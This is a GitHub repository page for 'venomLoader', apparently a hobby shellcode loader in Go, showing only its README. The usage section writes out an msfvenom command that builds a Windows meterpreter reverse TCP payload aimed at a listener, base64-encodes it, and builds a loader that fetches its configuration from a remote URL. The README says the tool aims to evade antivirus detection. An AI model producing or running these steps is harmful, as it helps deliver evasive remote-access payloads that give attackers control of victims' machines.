Skip to content

fistfulofhummus/venomLoader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Venom Loader

A tiny shellcode loader I am having fun with. It reads a JSON file from a base64 encoded URL. It works rather nicely and works mostly as advertised.

Usage/Examples

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LISTENER_IP> LPORT=<LISTENER_PORT> -f raw -o WHATEVER.bin
base64 WHATEVER.bin > WHATEVERb64.bin
./builder.sh <http://IP/config> main.go

At this point the loader as well as a basic payload should be ready. Modify the main.go and instr file to suit your situation. Keep in mind that the config is a json file that should be located in the same dir as the http server. This tries to be evasive but has various degrees of success with it. A meterpreter shell will be a coin toss on wether or not it gets caught but other payloads like popping calc, executing a fixed amount of commands work very nicely.

To-Do

  • Make a builder that automates creation of msf payload and base64 encoding it.
  • Remove dependancy on https://github.com/D3Ext/maldev/ to reduce built binary size.
  • Come up with a better name for the damned thing.

About

A tiny shellcode loader I am having fun with.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published